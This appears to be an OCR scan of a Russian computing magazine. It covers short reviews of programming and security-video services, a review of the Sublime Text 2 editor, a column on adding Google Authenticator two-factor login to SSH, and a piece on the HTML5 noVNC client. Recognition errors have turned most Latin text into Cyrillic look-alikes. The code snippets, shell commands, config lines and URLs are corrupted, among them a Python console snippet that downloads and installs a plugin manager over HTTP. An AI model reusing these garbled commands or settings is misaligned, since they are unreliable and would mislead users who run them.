не поймешь и не сделаешь все правильно, сервис не пустит на следующий шаг. Академия 
следитза прогрессом и выдаетнаграды а-ля Роигзриаге. 




5Н0ѴѴМЕ00 

аИоѵутебо.сот 

Есть еще один способ научиться азам (!) программирования, не заглядывая в мануал. Суть 
хорошо иллюстрирует старая добрая поговорка «Лучше один раз увидеть, чем сто раз 
услышать». Естьнемалосервисов (вроде реерсобе.сот или безігоѵаІІзоКѵѵаге.сопп ). которые 
за небольшую денежку предоставля ют доступ к хорошо снятым скрин кастам, в которых 
гуру-кодеры делятся решением конкретных задач. Видео с живым человеком — это уже не 
сухая статья, а наглядное видео с комментариями понимающего человека. Что называется, 
смотри и учись. ЗНоѵѵМеОо — это тоже сборник видеокастов для программистов, но разви- 
вающийся за счет энтузиастов, а потому на 100% бесплатный. В приоритете Ру^Иоп: только 
для негоздесьвыложеноболеебОО роликов на разныетемы. 



Видеокасты для программистов 




□ 

□ 





5ЕСІІРІТѴТІІВЕ 

ѵѵѵѵѵѵ.БесигііуіиЬе.пеі 

Раз уж мы заговорили про скрин касты, с нашей стороны грех не упомянуть профильный 
ресурс — ЗесигкуТиЬе. Это, бесспорно, самый большой агрегатор видео на тему инфор- 
мационной безопасности. Да, туттысяч и трешовых роликов, снятых индусами на кривом 
английском и показывающих, как за пустить Меіазріоі*. Ну и ладно. Зато здесь же хостится 
огромное количество видео с различных конференций, скринкастов от известных людей в 
области И Б, сотни демонстраций различных техник, сплоитов,Х-ТооІ 2 и РоС'ов. Есть даже 
целыетематические подборки видео, например, по аудиту беспроводных сетей. Кстати, 
если поискать, то легко находятся и некоторые наши ѴізиаІНаск++ :). 



Аггрегаторхак-видео 




Редактор блок-схем 



™ ГД 



А5СІІПОѴѴ 

ѵѵѵѵѵѵ.аБсіШоѵѵ.сот 

Очень забавный сервис. По сути, это редактор блок-схем, нос одним огромным отличием 
от, например, Ѵізіо. Вместо обычных графических элементов здесь используются исклю- 
чительно символы из Азсіі-та блицы. Получается полезный Азсіі а гі. Доступных элементов 
пока не очень много, но даже существующего набора достаточно, чтобы нарисовать слож- 
ные блок-схемы. Элементы после появления на полотне не превращаются в неуправляемый 
набор символов. Их можно перемещать, указывать связи между ними с помощью интерак- 
тивных стрелочек. Зачем нужны Азсіі-диаграммы? Да низа чем :). Нажав на кнопку « й М:аа !», 
ты получишь уже нормальную графическую схему. 
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Степан «Біер» Ильин (іѵѵіІІег.сот/зІераЫ 





ЗиЫіте Техі 2, 
или кунг-фу кодинг 

ПРАВИЛЬНЫЙ РЕДАКТОР 
КОДА ДЛЯ ПРОГРАММИСТА 



Если бы полгода назад меня 
попросили посоветовать 
редактор кода, то под ѴѴіп- 
сіоѵѵз я бы предложил ІМоІе- 
расІ++, под Ыпих — десііб, 
а под Мае — легендарный 
ТехіМаІе. Сегодня я ответил 
бы всем: ЗиЫіте Техі 2. И не 
только потому что он кросс- 
платформенный, а потому что 
это супер-редактор с целой 
дюжиной убойных фич. 



І'.'АУА'.Ч 

• Форум С большим 
количеством 
обсужденийя и 
плагинов для БиЬ- 
Ііте Техі: 
ѵѵѵѵѵѵ.зиЫітеІехІ. 
сот/іогит 

• Полезные плагины: 

уѵЬопгі.пеІ/зиЫіте 

раскадез 



БиЫіте Техі 2. Интерфейс под Мае 




олноценного релиза ЗиЫіте Техі 2 еще не было, но с каждым 
новым билдом редактор обрастает новыми фишками. Раз- 
работчики крепко взялись за создание убийцы ТехіМаІе, 
который пользуется бешеной популярностью среди программистов под 
Мае, но давно кардинально не обновляется. Поклонники шутят: йике 
ІЧикенсі Рогеѵег и тот вышел раньше, чем пользователям предложили 
вторую версию ТехіМаІе. Вокруг ЗиЫіте Техі, напротив, собирается 
большое сообщество программистов. Их легко понять: когда привыка- 
ешь ко всем фишкам, предлагаемых редактором, с трудом представля- 
ешь, как без них обходился ранее. Редактор радует буквально всем, а 
если чего-то и не хватает, то это без труда можно доставить с помощью 
расширений, которых становится все больше и больше, опять же за 
счет профессионального сообщества. По иронии судьбы, работает он 
не только под Мае, а под всеми популярными платформами. И это одна 
из главных его киллер-фич. 

КРОСС-ПЛАТФОРМЕННОСТЬ 

Что ни говори, а ЗиЫіте Техі никогда бы не завоевал такой популяр- 
ности, если бы не разрабатывался для ѴѴіпсІоѵѵз, 05 X и І_іпих одновре- 
менно. Работая под разными системами, больше не нужно использо- 
вать целый зоопарк разныхтекстовых редакторов, переключаясь с 
одного интерфейса на другой и вспоминая горячие клавиши (а какой 
кодинг без хоткеев?). Секрет кросс-платформеннысти отчасти кроется 
в платформе разработки, которую выбрали создатели редактора. В 
это сложно поверить, но ЗиЫіте написан на РуіИоп'е! Можно даже 
нажать комбинацию СігІ-' (тильда], чтобы в нижней части редактора 
появилась полноценная РуіЬоп-консоль. С помощью РуіИоп'а можно 
на лету управлять поведением редактора: есть специальные АРІ, 
которые используют создатели подключаемых плагинов. За кросс- 
платформенное счастье с РуіИоп'ом внутри разработчики даже не 
требуют денег. Точнее говоря, просят, но не требуют. В течение неогра- 
ниченного триала, ЗиЫіте лишь иногда будет напоминать: «Раз уж ты 
так давно пользуешься программой, стало быть, есть за что отдать $59 
долларов его разработчику?». Очень честно. 

УБОЙНЫЙ ИНТЕРФЕЙС 

Интерфейс ЗиЫіте можно любить, а можно ненавидеть. Он не похож 
ни на что другое. Разработчики подошли к этому вопросу творчески, 
стараясь реализовать тот путь работы с текстом, которые сами считают 
правильным. Тут неттулбаров и вообще лишних элементов интерфей- 
са. Только код и его уменьшенная проекция (мини-карта), отображаю- 
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ЗиЫіте Тех* 2, или кунг-фу кодинг 



щаяся с правой стороны. Оформление вкладок честно подсмотрено 
у СИготе. Отступы и ограничения блоков наглядно выделяются едва 
заметными пунктирными линиями, как это реализовано в КІо*ерасІ++. 

А в качестве цветовой схемы по умолчанию используется брутальный 
темный вариант, который непременно привлекает внимание тех, кто 
заглядывает в экран твоего ноутбука. Вариантов цветовых схем - 
тьма тьмущая, часть из них позаимствована из Тех*Ма*е. Поначалу 
не замечаешь каких-то мелких деталей, но со временем начинаешь 
ценить проработку мелочей. При выделении текста все пробелы и 
знаки табуляции выделяются спецсимволами, а уголочки незаметно, 
но очень приятно скругляются. Подсветка синтаксиса понимает, что 
для подсветки НТМІ_-исходника может понадобиться еще и схема для 
ЭаѵаЗсгір*, чтобы раскрасить соответствующий код. Всего из коробки 
поддерживается большинство языков программирования: С, С++, С#, 
С55, й, Егіапд, НТМІ_, бгооѵу, НазкеІІ, НТМІ_, Эаѵа, ЭаѵаЗсгір*, І_аТеХ, 

І_ізр, І_иа, Магкбоѵѵп, Ма*ІаЬ, ОСатІ, РегІ, РНР, Ру*Ноп, Р, РиЬу, 5СП_, ТСІ_, 
Тех*іІе и ХМІ_. Никто не мешает скачать дополнительные схемы или 
набросать свою собственную. 

МИНИ-КАРТА КОДА 

Рассказывая об интерфейсе ЗиЫіте, невозможно не остановиться на 
некоторых ноу-хау. Например, мини-карте кода, которая, как говорят 
сами разработчики, показывает исходник с высоты 10 000 футов. Это 
узкая панель с правой стороны, на которой выводится масштабируемая 
копия текста. Здесь невозможно рассмотреть сам текст, но зато сразу 
видна структура документа. И сразу понятно, какую часть сорца ты ре- 
дактируешь. Можно кликнуть в интересующее место карты — и ЗиЫіте 
покажет этот кусок кода. Кто-то может спросить: а зачем это нужно? 
Лучший способ ответить на этот вопрос -открыть в редакторе файл 
вроде этого: ра5*еЬіп.сот/гаѵѵ.рІір?і=7356г02М :). Кто-то, возможно, и 
против подобных наворотов, но лично мне, по ощущением, мини-карта 
действительно помогает в навигации по документу. А если эффектив- 
ность увеличивается хоть на два процента, то почему бы и нет? 

РАЗНЫЕ РЕЖИМЫ ПРОСМОТРА 

Для тех, кто стремиться к максимальному минимализму, есть свои 
плюшки: в первую очередь, режим «ОІ5*га*іоп Ргее Мобе» (5Ы** + Р11). 
Вотуж где не будет никаких отвлекающих факторов — только ты и код. 
ЗиЫіте Тех* скрывает абсолютно все элементы редактора и ОС. Можно 
обойтись без фанатизма — работать в полноэкранном режиме, кото- 
рый также позволяет использовать каждый пиксел экрана, но при этом 
сохраняя удобные панели редактора, консоль и мини-карту редактора. 
На экран легко выводятся несколько файлов одновременно, доста- 
точно лишь выбрать через меню («Ѵіеѵѵ -> І_ауои*»] подходящую сетку. 
При этом переключаться между такими панелями можно очень легко с 
помощью горячих клавиш. 



Раскаде СОПІГОІ: 

Р-аскадс Сштігаі: Асе; йвроігіагу 
Раскаде Сопьоі ОінЫе Рзскаде 
Раск*д* Сопігоі- Оікоѵе.' Рзекздн 
Раскад« Соп*го1: ЕллЬІя Расісэдр 
Рлскадс СстігоІ: ГпЫхіІІ Раскауц 
Рлсклдс Сопігоі: Раскэдк 

Рпск оде- СапІгоІ; Йегпаѵе Рлскадр 
Сопігок Црдгзііе Распаде 
Рлсклдс СопігоІ: Абб Яер№ГОгу СНаппеІ 
Рае к ад* Сопігоі: Сгг-дір Рагк-ддр Г Ій 
Рлсклдс Сопігоі.: Сг-еаіе Ёіпаіу Раскадм* Рііе 
Рлск л Се гіі г л I ;.і |>д га ЛИ Раскадк 



Управление пакетами 







Альтернативная и очень удачная тема Боба 



КОМАНДНАЯ ПАНЕЛЬ 

Как и в Тех*та*е, в ЗиЫіте Тех* есть командная панель. Это супер- 
удобный инструмент, который вызывается через меню «Тооіз» или 
хоткеем С*гІ + ЗИі** + Р (в Мае: ЗИі** + Соттапб + Р]. Неважно, хочешь 
ли ты вставить сниппет, вызвать макрос, выполнить преобразование 
текста (например, перевести все буквы в ЗАГЛАВНЫЕ], — все это 
можно сделать через Соттапб РаІе**е. Просто нажимаешь хоткей, 
набираешь начальные символы названия элемента (скажем, сниппета 
Тгу/Ехсер*) — и ЗиЫіте показывает нужные варианты. 5 минут привы- 
кания — и любые сниппеты ты вставляешь в 33 раза быстрее, чем если 
бы сбивался и ковырялся мышкой в меню. Причем элементы, выво- 
дящиеся на командной панели, подстраиваются подтип файлов: для 
ру-исходника не будет лишних сниппетов, кроме заготовок для Ру*Ьоп. 

60 АМѴТНІЫб 

Другая панель, о которой другие редакторы могуттолько мечтать, на- 
зывается «Со Апу*Ыпд». Название не врет: она действительно помогает 
перейти в документе к чему угодно. Вызывается горячей клавишей С*гІ 
+ Р (Мае: Соттапб + Р). Далее есть варианты. Можно набрать название 
файла, чтобы открыть его. Поиск осуществляется по открытым файлам, 
файлам проекта, а также недавно закрытым документам. Результатты 
получаешь мгновенно, по мере набора маски, даже если в проекте 50 
000 документов! Хочешь перейти к нужной 10 строке в текущем файле? 
Набирай в поле ":10". Вводим символ "#" и осуществляем простой 
поиск по текущему файлу. Причем ЗиЫіте мгновенно отображает в 
списке подходящие под критерий элементы. Отдельно хочу обратить 
внимание на поиск по символам (переменным, функциям, классам]. Для 
этого строку поиска надо начинать с символа Таким образом, найти 
и перейти к нужной функции — это пара нажатий на клавиатуру (кстати, 
для поиска по символам можно сразу использовать хоткей С*гІ + Р]. И 
здесь опять же работают подсказки и автокомплит. Механизм не только 
быстрый, но и умный. Например, если ввести *р(сИ, мы сможем переме- 
ститься к функции геасІ_б1е открытого файла 1:ех1:_рап5еп.ру, а 1:р:100 
перенесёт к 100-й строчке того же файла! Секрет быстрого поиска в 
том, что ЗиЫіте Тех* в фоновом режиме подгружает файлы, которые с 
большой вероятностью понадобятся тебе во время работы. 

МНОЖЕСТВЕННОЕ ВЫДЕЛЕНИЕ 

Еще одна улетная фича. Суть в том, чтобы не делать одинаковые из- 
менения 10 раз, а делать 10 изменений разом. Ты можешь установить 
курсор в разных местах страницы — и набираемые символы будут ду- 
блироваться во всех выбранных областях. То, что раньше приходилось 
выполнять с помощью регулярных выражений или поиска с заменой, 
теперь зачастую быстрее сделать через множественное выделение. 
Самый простой вариант — просто зажать АІ* (или Соттапб под Мае ом] 
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Поиск реализован очень здорово и поддерживает регулярные выражения 
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Мультивыделение 



и потом кликнуть в тех местах документа, где нужно расположить кур- 
сор. Или выбрать блок строк и нажать 5ЫЕ: + СігІ/Соттапб + І_ — текст 
будет набираться на каждой из них. Но удобнее всего другой режим, по- 
зволяющий отредактировать одинаковые элементы (названия функций, 
переменных и т.д.) Для этого надо поместить курсор на нужном слове и 
затем несколько раз нажать СоЫгоІ/Соттапб + й. Каждое нажатие — 
каждое новое «захваченное» вхождение этого слова. Можно сразу по- 
ставить дополнительный курсор во всех вхождениях нужного слова. Это 
делается нажатием АН + РЗ под виндой и С*гІ+Соттапб+6 под маком. 

АВТОМАТИЗАЦИЯ 

Множественное выделение — не единственный способ сэкономить 
время на операциях с текстом. Ктвоим услугам классно реализованные 
функции поиска и замены. Рутину могут автоматизировать макросы, 
которые позволяютзаписывать действия с текстом, а потом их повто- 
рять. Есть еще одна похожая опция — повторение последнего действия. 
Если покопаться в меню ЕбіЕ то найдешь еще немало интересных 
опций для редактирования. Например, сортировку текста или наоборот 
перемешивания строк. Для проектов на С++ есть фишка переключения 
между хедером и файлом с реализацией — АІІ-0 (РіІе-5\л/ар Неабег/ 
ІтрІетеп1;аІіоп). Само собой, доступна система сборки. Поддерживают- 
ся проекты, написанные на: й, Егіапд, НазкеІІ, ЭаѵаС, Маке, РуШоп, НиЬу. 

ПОДДЕРЖКА ПЛАГИНОВ 

Возможности редактора легко прокачивается за счет подключаемых 
плагинов (которые, как и сам редактор, пишутся на РуіИоп'е). Если 
еще не так давно дополнительных пакетов было не так много, то 
теперь есть из чего выбрать. Сказывается стремительное развитие 
редактора и ошеломляющий успех у программистов, которые рину- 
лись реализовывать те фишки, которые они использовали в других 
редакторах и не нашли из коробки в ЗиЫіте Тех*. Вместо того чтобы 
вручную скачивать исходники аддонов и размещать в нужных дирек- 
тория БиЫіте'а, удобнее воспользоваться специальным менеджером 
пакетов. Он пока недоступен по умолчанию (уверен, что временно], 
но сам реализован в виде подключаемого пакета. Чтобы установить 
ЗиЫіте Раскаде Сопігоі, нужно открыть внутреннюю консоль при- 
ложения (напомню, что это полноценный Ру*Ноп-интерпретатор) и 
вставить туда следующий сниппет кода: 

ітрогі: иг1НЬ2 . об ; р-Р=' Раскате СоітЕгоі. Б иЫіте-раска^е' ; 
ірр=5иЫіте . Іп5і:а11еб_раска§е5_ра1:1і ( ) ; об . такебігБ (ірр) 
і-р поЕ ОБ.ра1:Іі.ехІ5І:5(ірр) еізе ІМопе; 
ореп(оБ.раЕІі. доіп(ірр.,р-р)., ’ыЬ' ) .ыгі1:е(ип11іЬ2.иг1ореп( 
, ІіЕЕр://5иЬ1іте.мЬопб.пе1:/ , +р-р.гер1асе( ' ' 3 '%20' )) .геаб()) 

После перезапуска приложения в менюты найдешь пункт 
«Рге^егепсез -> Раскаде сопігоі». Если выбрать в появившемся меню 



ВАЖНЫЕ ДОПОЛНЕНИЯ ДЛЯ ЗІІВЫМЕ ТЕХТ 
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Моіе 

ЬіЫу/тРІеАО 



Автокомплит, реализованный в 
ЗиЫіте по умолчанию, не слишком 
крут. Подключивэтотплагин,ты по- 
лучишь всю мощь технологи ия Собе 
ІпІеІІідепсе от известного Котобо 
Ебііюг. Это нетолько правильный 
а втокомплит,н о и дополнительные 
подсказки при наборе кода, а также 
удобная навигация по сорцам. 



Из коробки ЗиЫіте не поддер- 
живает интеграцию с системами 
контроля версий. Ноэтоупущение 
давно исправили энтузиасты, вы- 
пустив соответствующие плагины. С 
помощью этого аддонаты сможешь 
работать с репозиториями СІЕ 
Аналогичные есть и для 5ѴІЧ, и 
МегсигіаІ. 



Полезное дополнение, которое 
внутри ЗиЫіте Тех* реализует исто- 
рию изменений для буфера обмена 
(аналог йіио), позволяя быстро 
обратиться клюбому изэлементов. 
Причем в историю попадаюттолько 
те сниппеты кода, которыеты занес 
из ЗиЫіте Тех* и только по горячей 
клавише(СігІ + С]. 



Этот плагин позволяет редакти- 
ровать файлы по протоколам БЙр/ 
ббИ 2, предоставляя максимально 
прозрачное взаимодействие с фай- 
лами на сервере. Имей в виду, что 
для работы ему необходимы бинар- 
ники известного клиента РиТТѴ — 
какдля поддержания соединения, 
так и генерации ключей. 
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ЗиЫіте Тех* 2, или кунг-фу кодинг 



ПОЛЕЗНЫЕ ТИПСЫ 



1 


Если ЗиЫіте Тех* не может определить 
кодировку файла, то он автоматически 
выбирает ѴѴіпсІоѵѵз 1252. Конечно, 


<4 


Если ты большой фанатѴі а, то тебя осо- 
бенно должен порадовать специальный 
режим редактора «Ѵіп*аде Мобе». Он 


3 



можно открыть файл заново, принудительно 
выбрав кодировку (Рііе Реореп ѵѵі*Н епсосі- 
іпд -> ѴѴіпсІоѵѵз 1251), но это быстро надоедает. 
Правильнее заставить ЗиЫіте выбирать по 
умолчанию не ѴѴіпсІоѵѵз 1252, а ѴѴіпсІоѵѵз 1251. Для 
этого нужно внести минимальные изменения 
в конфиге (Рге*егепсез -> Рііе зе**іпдз Ое*аиІ*). 
Находим там строчку: 

^■Ра11Ьаск_епсосИп§" : "Іліезісепп (ілііпсіоыб 

1252)",, 

И меняем ее, соответственно, на: 

"-Ра11Ьаск_епсосІіп§" : "Сѵгііііс (ілііпсіоіѵз 
1251)", 



позволяет объединить привычные команды ѵі и 
все удобные фичи ЗиЫіте Тех*'а, включая авто- 
вы деление. Этот режим по умолчанию отключен, 
чтобы не пугать неподготовленных пользовате- 
лей. Чтобы активировать его, придется открыть 
конфиг«Рге*егепсез -> ОІоЬаІ 5е**іпдз Ое*аиІ* 
теп и Нет» и убрать па кетѴіпа*е из списка 
игнорируемых (выключенных пакетов), поправив 
следующую строчку: 



"і^погес^раска^ез" : 
//было 



Х^ѴіпТа^е" ] 



"і^погесі раска^ез" : [] 

^ __ 

Перезапусти ЗиЫіте. Нажми Е5С. — если 
в статус-баре появилась знакомая надпись 
ІІМ5ЕКТ МОРЕ, значит, все заработало :). 



На мой вкус, стандартнаятема оформ- 
ления ЗиЫіте Тех* выше всяких похвал. 
Можно поиграться с други ми тема ми, 
которые идутиз коробки, но, если хочешьчего-то 
особенного, рекомендую нестандартныетемы 
Зоба (есть две вариации — светлая и темная). 

1. Скачиваем . 2 Ір-архив с 6і*НиЬ-странички про- 
екта ( ЬП.Іу/п I МдТ7 ) 

2 . Распаковываем файлы в катал огТНете -> 
Зоба и помещаем ее в папку Раскадез внутри 
ЗиЫітеТех*. 

3. Далееактивируем схему, прописывая ее в на- 
стройках (Рге^егепсез -> ІІзегбІоЬаІ ЗеШпдз). 
Взависимости оттемы: светлой (Зоба І_ідН*. 
зиЫітеПНеппе) илитемной (Зоба Оагк. 
зиЫіте-Ыеітіе), вставляем нужную строчку в 
конфиг: 



"Ііііете"^ "Зоба И^ітЕ . зиЫіте-1:Ііете"_ 
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РуЫоп внутри. Открываем консоль 

«ІпзІаІІ раске*», то ты увидишь список аддонов, доступных для установ- 
ки. Менеджер пакетов сам скачает все файлы и разместит их в нужных 
директориях — тебе остается лишь выбрать пакет. 

2ЕЫ СОйІЫб 

Чтобы ощутить всю мощь, которую предоставляют плагины, предлагаю 
подключить пакет 2еп Собіпд. Этот аддон реализуетхитрый способ 
ускоренного написания НТМІ_ и С55 кода, которым я давно пользуюсь. 
Идея заключается в применении специальной системы аббревиатур и 
краткой записи кода, которые по определенным правилам «раскрыва- 
ются» в полноценный код. Суть лучше всего объяснит пример. 

біѵ#ра§е>біѵ.1о§о+и1#паѵі§а1:іоп>1і*3>а 

Написав этот код, нажимаем нехитрое комбо на клавиатуре 
(с*гІ+зрасе, как для автодополнения) и получаем следующий результат: 

<біѵ іб="ра§е"> 

<біѵ с1а55="1о§о"х/біѵ> 

<иН(1= " паѵі§а1:іоп " > 

<1іха *і г е-Р= " " х/ ах/ 1 і > 

<1іха Ьге-Р=""х/ах/1і> 

<1іха Ьге-Р=""х/ах/1і> 

</и1> 

</біѵ> 

Освоив очень простые правила (Ьі*.Іу/рЕА6а11 ], ты ускоришь разработ- 
ку разметки в разы. Вотхорошая демонстрация: ЬіСІѵ/рірЬЗЦ . Поверь, это 
тот самый случай, когда лучше один раз увидеть, чем сто раз увидеть. 



ПРОЕКТ 

Не могу не похвалить то, как в редакторе реализована система проек- 
тов. В проекте полностью бэкапится состояние редактора, включая все 
измененные и несохраненные файлы. Если тебе вдруг понадобилось 
переключиться на другой проект, ты... просто туда переключаешься. 
Например, через туже панель «6о*о Апу*Ыпд». Переключение проис- 
ходит мгновенно. Без лишних лагов и десятка вопросов а-ля «Хотите 
ли сохранить изменения?» (потому что все изменения сохраняются ав- 
томатически). Когда ты в следующий раз откроешь проект, все будет в 
том же виде, что и при закрытии. Чего тут лишние вопросы задавать? :). 

Чтобы добавить файлы в проект, достаточно перетащить их на 
сайдбар (панель слева). Заметь, не открывать (что часто не нужно) фай- 
лы, а просто прилинковать нужные из них, добавив в список. Можно 
даже перетащить целую директорию — ЗиЫіте Техі: обработает все 
сразу. Сайдбар — это вообще довольно удобный инструмент для изуче- 
ния кода. Если кликнуть по какому-то из файлов проекта, то редактор 
не будет открывать 153-ю ненужную вкладку, а просто отобразит ее. 

И в самом деле: зачем нужна вкладка, если нужно просто что-то посмо- 
треть внутри документа? Если же ты хочешь редактировать документ, 
по файлу нужно кликнуть дважды. Это удобно. 

РЕЗЮМИРУЮ 

Из таких маленькихудобных фенек и состоит весь ЗиЫіте Тех*. 

Если попробовать описать программу в двух слова, то я бы назвал ее 
редактором-убийцей. Она работает под разными системами. Из короб- 
ки предоставляет несколько уникальных фич. Разработчики уверенно 
реализуют лучшие фичи из других продуктов, активно поддерживая 
миграцию (реализовав, например, поддержку бандлов Тех*Ма*е). 

А те фишки, которых программистам не хватает, часто появляются 
реализованными в виде плагинов. Успех пугает состоявшихся игроков 
рынка. Даже заскучавшие создатели Тех*Ма*е'а засуетились под напо- 
ром укрепляющегося конкурента, пообещав до конца года выпустить 
новую ветку своего продукта. Да, у ЗиЫіте есть некоторые проблемы, 
которые могут испугать — взять хотя бы необходимость ковыряться в 
текстовых конфигах. Ноя уже с трудом представляю работу без этого 
быстрого редактора с классным интерфейсом, системой сниппетов, 
удобным поиском и панелям «6о То Апу*Ыпд», мультиселектом и под- 
держкой гепсосііпд. Рекомендую. □С 
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КОЛОНКА РЕДАКТОРА 

Про двухфакторную 
авторизацию 
для Ь5Н 



смело могу дать тебе пароль для своего аккаунта на бтаіі. 
Вот он: НсНк л і2. Я точно знаю, что ты не сможешь получить 
доступ к почте без одноразового ключа, который генери- 
рует специальное приложение на моем телефоне. И это благодаря 
двухфакторной авторизации, которую может включить каждый в 
настройках своего боодіе-аккаунта. Но использовать подобный ин- 
струмент только для входа в 6МаіІ довольно скучно. Поэтому сегодня 
я хочу поделиться с тобой, как я прикрутил эту же самую систему для 
безопасного входа на мои 55Н-серверы. 

Итак, двухфакторная аутентификация. Идея заключается в том, 
чтобы усилить стандартную схему авторизации «логин — пароль» 
дополнительным одноразовым ключом. Последний генерируется 
специальным мобильным приложением боодіе Аи1:НепІіса*ог (есть 
версии для іРИопе, АпбгоісІ, ВІаскВеггу] на основе открытых алгорит- 
мов и специального ключа, который есть у программы-генератора и 
боодіе. Когда сервис просит ввести одноразовый ключ, нужно ввести 
цифры с экрана телефона — и вход осуществлен. Если же ключа нет, 
то зайти в почту ты не сможешь, пусть даже у тебя откуда-то есть 
правильные логин и пароль (например, человек сказал тебе их сам, 
как только что сделал я :). 

Надо сказать, что боодіе развивает идею двухфакторной автори- 
зации в правильном направлении. Исходники мобильных приложений 
открыто доступны, а в качестве алгоритмов используются черновики 
альянса ОАТН (Іпіііабѵе {ог Ореп АиНіепбсабоп), который поддерживают 
многие известные вендоры (в том числе бутап^ес и Ѵегібідп). Но что 
еще более важно: помимо утилит для генерации кодов, боодіе предла- 
гает еще и вторую часть системы, которая эти самые ключи проверяет. 
Ты беспрепятственно можешь скачать подключаемый модуль аутенти- 
фикации (РАМ) и использовать прелести двухфакторной авторизации, 
например, в ОрепббН. 

1. Загружаем исходники РАМ -модул я из боодіе бобе хранилища: 

Іі§ сіопе Іі1:1:р5://§оо§1е-аи1:Ііеп1:іса1:ог .§оо§1есобе.сот/ 

Іі§/ ^оо^1е-аи1=Ііеп1=іса1=ог/ 



2. Пробуем компилировать: 

ссі §оо§1е-аи1:Ізеп1:іса1:ог/1іЬрат/ 

$ висіо таке 

Если сборка вывалится с ошибкой, то надо отредактировать 
МакеПІе (патч можно посмотреть здесь: Ьі1.Іу/д7ау5Л . 

3. Переносим модуль рат_доодІе_аи*НепІіса1:ог.50 в /I іЬ/зеси гНу/, а 
доодІе-аи1:Ьеп1:іса1:ог в/изг/Ып. 

4. Далее добавляем строчку в/еІс/рат.б/55Иб, чтобы 53Н-демон под- 
гружал наш РАМ-модуль: 

аиі:И гециігеб рат_§сю§1^аи1:Ііеп1:іса1:с>г . бо 
И обновляем конфиг/е1:с/55И/55Иб_сопЛд: 
СІіа11еп^еКе5роп5еАи1:Ьеп1:іса1:іоп ѵѳб 

5. Все, теперь все подключено. Оста л ось на строить саму двухфактор- 
ную авторизацию, сгенерировав секретный ключ: 

$ §оо§1е-аи~ЬНеп1:іса1:ог 

Іі1:1:р5://ыыы.§оо§1е.сот/сІіаг1;?сІі5=200х200&. . РВРІлІІІ_6РВУІ_ѴВ(2 
Уоиг пем бѳсгѳі: кеѵ іб: У ОГВРІЛІІІ. 6РКУІ.ѴВО 

6. Полученный линк можно открыть в браузере. На экране появится 0Р- 
код, который нужно сосканировать на телефоне приложением боодіе 
АиШепбса^ог, чтобы то, в свою очередь, сохранило сгенерированный 
секретный ключ. Заметь, программа по-прежнемубудетгенериро- 
вать ключи и для твоего аккаунта в боодіе (само собой, разные]. 

7. Ребута ем 55Н0, чтобы изменения вступили в силу, и убеждаемся, 
что для подключения теперь нужен еще и временный ключ! ПЕ 
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Настраиваем РАМ-модуль 



Сканируем ОР-код нателефоне 



Получаем временный ключ 



Вводим ключ при подключении 
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"? РгооРоРСопсерІ: 




ѴЫС-КЛИЕНТ НА НТМ15 



Каждый раз, когда речь заходит о решении для удаленного 
подключения к рабочему столу, мы всегда обращаем внимание на 
важный момент: можно ли использовать его прямо из браузера? 
Многие известные продукты предоставляют подобный функционал, 
но веб-клиент реализован при помощи Эаѵа или РІазИ. Создатели 
поѴЫС пошли дальше. Это первая реализация ѴІМС-клиента, 
полностью написанная на НТМІ_5 (ѴѴеЬБоскеІз + Сапѵаз). 



Технология ѴЫС (Ѵіг^иаІ Ые1:\/ѵогк СотріЛіпд) давно 
стала одним из наиболее популярных решений 
для подключения к удаленному рабочем столу. В 
ее основе лежит проверенный временем протокол 
ПЕВ (генлоке {гатеЬіЖег]. У Іпіеі даже появилась 
его аппаратная реализация - Іп*еІ КѴМ, благодаря 
которой ты можешь удаленно подключиться к 
компьютеру еще до запуска операционной систе- 
мы. ѴКІС-клиенты можно найти для любых ОС, в 
том числе и мобильных. Но теперь есть реализа- 
ция, которая вообще не зависит от платформы. 
поѴІЧС ( капака.аі1:НиЬ.сот/поѴ1\ІС І работает в 
браузере и использует лишьтолько возможности 



НТМІ_5. Фишка в том, что такая реализация будет 
нормально функционировать вообще на любом 
устройстве, для которого есть браузер, поддержи- 
вающий новые стандарты. 

ТРЕБОВАНИЯ 

поѴКІС использует самые современные воз- 
можности НТМІ_5, поэтому главные требования 
проект предъявляет к браузеру. Он должен 
поддерживать: 

• НТМІ_5Сапѵаз(ссгеа1:еІтадеВа1:а]. 

• НТМІ_5ѴѴеЬ5оске1:5. Для тех браузеров, 
которые не имеютвстроенной поддержки 
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ѴКІС 



поѴІМС не требует ничего, кроме браузера с НТМІ.5 



ѴѴеЬЗоскеІз, проект включает в себя ѵѵеЬ- 
зоскеі-із-это эмулятор ѴѴеЬЗоске^з, исполь- 
зующий для работы АбоЬе РІазН. 

• Быстрый движок ^ѵазсгірі: Епдіпе. Если быу 
браузера не было быстрого ^-движка, едва 
ли удалось реализовать полноценный про- 
токол РРВ. 

На практике лучше всего подходят СНготе и 
Ріге^ох, которые используют технологию Иаіііѵе 
ѴѴеЬЗоскеІз. 



ЧТО ВНУТРИ 

поѴКІС - это композиция нескольких модулей, 
которые рендерят изображения, обрабатывают 
ввод данных, поддерживают сетевое соеди- 
нение. Каждый из модулей написан таким 
образом, чтобы работать под разными браузе- 
рами. Наиболее важными являются, во-первых, 
Оізріау (іпсіисіе/сіізріау.із], который занимается 
рендерингом изображений с помощью НТМІ_5- 
элемента сапѵаз, во-вторых, РРВ (іпсІисІе/гЛэ.із), 
являющийся основным классом для реализации 
протокола РРВ, и, в-третьих, ѴѴеЬзоск (іпсіисіе/ 
пе^ѵѵогк.із], который используется для передачи 
данных Маііѵе ѴѴеЬЗоскеІіз и автоматически 
переключается на технологию РІазИ ѴѴеЬзоскеІ в 
случае необходимости. 

КАК ИСПОЛЬЗОВАТЬ? 

До тех пор, пока ты не используешь ѴІЧС-сервер 
с поддержкой соединений через ѴѴеЬЗоске^з 
(таких какхІІѵпс/ІіЬѵпсзегѵег), тебе придется 
использовать специальный прокси-сервер 
\Л/еЬ5оске*з2ТСР. К счастью, реализация такого 
посредника, написанная на РуіНоп, включена 
в проект (это ѵѵеЬзоскі^у] и, что важно, имеет 
встроенную поддержку 55І_/ТІ_5-шифрования ( 
"ѵѵзз://"]. Для начала работы есть специальный 
скрипт, который запустит тіпі-ѵѵеЬзегѵег, на 
котором дальше будет принимать подключения, 
и ѴѴеЬЗоске^з-прокси. В параметрах необходимо 
указать адрес запущенного ѴИІС-демона: 

. /иІііІз/ІаипсИ. зИ --ѵпс ІосаІИозІ:: 5901 

Прокси после запуска выдаст ІІПІ_, который 
необходимо вставить в браузер. Далее останет- 
ся нажать на кнопку «Соппесі» и наслаждаться 
подключением. Запущенная прокси будет 
принимать подключения и транслировать их 
реальному ѴМС-серверу. □С 
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Агез (іпіегсеріег.пегіги) 




